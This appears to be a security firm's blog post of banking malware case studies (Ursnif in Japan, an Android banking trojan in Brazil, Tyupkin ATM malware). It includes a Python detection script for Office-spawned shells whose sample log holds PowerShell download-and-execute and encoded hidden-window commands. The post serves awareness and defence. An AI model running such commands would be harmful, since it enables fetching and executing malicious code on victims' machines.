The Curious Case of Banking Frauds — Malware — Part 1

Arun Thomas
Nov 3 · 4 min read

This article is part of the “The Curious Case of Banking Frauds” series, a set of case studies published by the NetSentries Cyber Threat Management Team on various banking frauds. Its aim is to raise awareness of the need to make security part of business strategy, so as to improve the overall security posture of a financial institution and its associated service components.

1. Ursnif Banking Trojan — Japan

Breach Reported in: 2019,2018
Target Location: Japan
Initial Threat Vector: Phishing

In the past few years the rate of cyber-attacks has been leaping up, and day by day the attacks are getting broader and more evolved. The latest victims are Japanese banks, which encountered a malware attack on 12th March 2019. A malware known as the Ursnif Trojan was used to steal the credentials of bank clients.
Japanese banks have been targeted by Ursnif’s operators for the past few years. A similar attack was executed with Ursnif in 2018, mainly using the Dreambot variant. In 2019 they used a different variant that is much more focused on stealing data from emails.
Ursnif is one of the most widespread and effective malware families used for credential stealing. This malware is enhanced with modules that target banking security products such as Phishwall.
The attack is executed by sending a phishing email to the victim. The mail carries a malicious attachment, typically an Excel spreadsheet. The sheet shows an “Enable Content” button, and pressing it activates the embedded macro code. That code contains PowerShell commands which download the malware.
The Ursnif operators developed the new variant with crafty persistence techniques. They worked on minimizing its digital footprint and evading as many security gateways as possible. It is also fitted with potent information-stealing modules focused on emails and digital wallets.
The Ursnif attack on Japanese banks led to financial damage globally and caused losses of tens of millions of dollars for individuals. The operators planned a localized attack strategy targeting only Japanese users; Cybereason established this through several investigations of the malware’s checks on location and language settings.
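The phishing chain described above (Excel attachment, “Enable Content”, macro, PowerShell download) leaves a characteristic trace on the endpoint: an Office process spawning a shell whose command line fetches or decodes a payload. The following detection logic is an added example written for this article and is not code from NetSentries or from any vendor; the log format and the sample events are constructed for illustration, and the field names (host, user, parent, image, cmd) are assumptions standing in for what Sysmon Event ID 1 or an EDR process-creation feed would provide.

```python
"""Flag Office applications launching a shell, as in the Ursnif macro chain.

Added example, not part of the original article. The log line format and
the sample events below are constructed; real telemetry (Sysmon Event ID 1,
EDR process-creation events) carries the same fields under other names.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Parent processes that should almost never spawn an interpreter.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters commonly launched by a malicious macro.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}

# Command-line indicators of a download or an obfuscated launch (assumed list).
INDICATORS = {
    "download_string": r"downloadstring",
    "download_file": r"downloadfile",
    "invoke_webrequest": r"invoke-webrequest|\biwr\b",
    "webclient": r"net\.webclient",
    "bits_transfer": r"start-bitstransfer|bitsadmin",
    "encoded_command": r"-enc(odedcommand)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "base64_decode": r"frombase64string",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}

# Constructed log format: key=value fields, with the command line last.
LOG_RE = re.compile(
    r"^host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+"
    r"image=(?P<image>\S+)\s+cmd=(?P<cmd>.*)$"
)


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return ProcessEvent(m["host"], m["user"], m["parent"], m["image"], m["cmd"])


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> Optional[dict]:
    """Return an alert dict when an Office parent launches a shell, else None.

    Any Office-to-shell launch is 'medium'; it becomes 'high' when the command
    line also carries a download or obfuscation indicator.
    """
    parent = _basename(event.parent_image)
    child = _basename(event.image)
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None
    hits = [name for name, rx in COMPILED.items() if rx.search(event.command_line)]
    return {
        "host": event.host,
        "user": event.user,
        "parent": parent,
        "child": child,
        "severity": "high" if hits else "medium",
        "indicators": hits,
    }


def scan(lines: List[str]) -> List[dict]:
    """Run the detection over a sequence of log lines and collect alerts."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue          # malformed line: skip rather than crash the pipeline
        alert = classify(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events: two macro-style launches, one benign admin use of
# PowerShell, one Office-spawned cmd.exe with no download indicator, one bad line.
SAMPLE_LOG = [
    r'host=WS-042 user=CORP\jdoe parent=EXCEL.EXE image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    r'host=WS-017 user=CORP\asmith parent=WINWORD.EXE image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -NoP -C IEX (New-Object Net.WebClient).DownloadString("http://files.example.invalid/load.ps1")',
    r'host=WS-042 user=CORP\jdoe parent=explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe Get-Process',
    r'host=WS-088 user=CORP\bkim parent=EXCEL.EXE image=C:\Windows\System32\cmd.exe cmd=cmd.exe /c echo macro test',
    r'garbage line that does not match the expected format',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The parent/child pairing is the durable part of this rule: the indicator list will age as tooling changes, but an Office application spawning an interpreter is rare enough in most estates that the medium-severity alert alone is worth triaging, and it fires even when the command line is fully obfuscated.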

Failed Security Controls:

• Social Engineering and spear phishing awareness
• Content Security Gateways
• Endpoint Security solutions

2. Brazilian Mobile Malware

Breach Reported in: 2018
Target Location: Primarily Brazil
Initial Threat Vector: Rogue Mobile Application

In 2018, Brazilians became the victims of an Android-based malware attack. More than 2000 mobile banking customers were affected. Unknowingly these people downloaded the malware, which led to the loss of confidential data.
The Trojan used for this attack was Android.BankBot.495, and it was distributed through the Google Play store. The malware is designed to obtain access to Android accessibility features. Once a device is infected, the malware keeps working in the background; it auto-taps buttons and steals credentials from the applications that are opened.
According to research conducted after the attack, Android.BankBot.495 reads account information from the banking application and then attempts to log in automatically with credentials obtained from its command and control server.
The Trojan can read the victim’s bank account balance through the private banking data. Having gained this access, it automatically transfers money to the cyber criminals. This was established by the analysis cyber security analysts conducted on Bradesco, one of the largest private banks in Brazil.
The malware is not designed only to access the online banking application. The Trojan overlays the Android display with a malicious web page that imitates the targeted application, and then automatically enters the user’s credentials.
This Brazilian mobile malware attack makes it clear that the Play Protect feature of Google Play needs to be improved to the next level.

Failed Security Controls:

• Social Engineering and spear phishing awareness
• Brand Monitoring of App Stores
• End User Security Awareness

3. Tyupkin ATM Malware — Europe

Breach Reported in: 2015
Target Location: Primarily Europe
Initial Threat Vector: Bootable CD ROM

On October 7th 2014, a malware known as Tyupkin was found attacking ATMs across Europe, leading to considerable financial loss. More than 50 ATMs were infected in Eastern Europe and the cybercriminals made millions.
The Tyupkin malware is installed physically on Windows-based ATMs across the country. It enters codes automatically into the machines and withdraws the cash. European authorities managed to dismantle the crime ring very effectively.
All the infected machines came from the same manufacturer and ran a 32-bit version of the Windows OS. The cybercriminals targeted cash machines manufactured by NCR, a globally renowned ATM manufacturer.
The infected cash machines had a CD-ROM drive behind a panel opened with a universal key. The malware was installed from a bootable CD. The Trojan works only on weekends and self-destructs afterwards.
The attackers designed the malware so that the key needed to access it is generated randomly each time. This made it almost impossible to access the malware from outside the gang. Once the malware was running, they were able to withdraw forty notes at a time from each machine.
The gang managed to rob the cash machines until security companies started tracking them in January 2015. ATMs running the Windows OS with few security features and no physical protection are vulnerable even now.

Failed Security Controls:

• ATM Security Module

Written by Arun Thomas, Chief Operating Officer at NetSentries Technologies
